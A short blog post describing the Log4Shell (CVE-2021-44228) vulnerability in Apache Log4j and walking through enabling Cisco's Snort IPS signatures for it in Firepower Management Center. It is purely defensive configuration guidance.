top of page

IPS FMC for Log4Shell

In general terms, last week, a zero-day vulnerability called Log4Shell was discovered and could be exploited by remote attackers around the world. A zero-day vulnerability is a vulnerability that has just been discovered and does not yet have a patch to fix it, so the main threat is that, until the patch is released and users install it on their equipment, attackers can exploit the vulnerability and take advantage of this security hole.

That said, a critical remote code execution vulnerability has been revealed in the popular Apache Foundation Log4j library, a logging library designed to replace the built-in log4j package that is often used in popular Java projects like Apache Struts 2 and Apache Solr. This could allow an attacker to take control of an affected server. It can be used in default settings by an unauthenticated remote attacker to point to applications that use the Log4j library.

This vulnerability, called CVE-2021-44228, received a CVSS severity score of at most 10.0 and is widely considered to be easy to exploit.

Cisco has made available some signatures in the IPS packet to detect exploit attempts directed at CVE-2021-44228.

They are: Snort 2 SIDs: 58722 - 58744 and Snort 3 SIDs: 300055 - 300058.

Before do that, you must have the latest rules update package available today (Snort Rule Update 2021 12 11 002 vrt) and the rules must be enabled in all the policies and the policies reapplied in the firewalls.


#1) Update your package rules on your FMC:

updates / rule updates / download new rules from the Support Site/ [Import]

#2) Make a filter for CVE:"2021-44228"

policy / intrusion / <your_ftd> / rules / rule content / reference / CVE ID

Under "rules state" select all and choose "drop and generate events".

Click Policy Information, confirm the changes, then Deploy.


60 views0 comments

Recent Posts

See All

Syslog is a protocol that computer systems use to send event data logs to a central location for storage. Logs can then be accessed by analysis and reporting software to perform audits, monitoring, tr

ISE Repositories can be configured from both the GUI and the CLI of the ISE and can be used for these purposes: ➛ Backup and Restore of ISE Configuration and Operational data; ➛ Upgrade of ISE nodes;

Secure Unlock Client mechanism provides root shell access on Cisco ISE Command Line Interface (CLI) for a certain period of time. As soon as the session is closed or exited, the root access is also re

bottom of page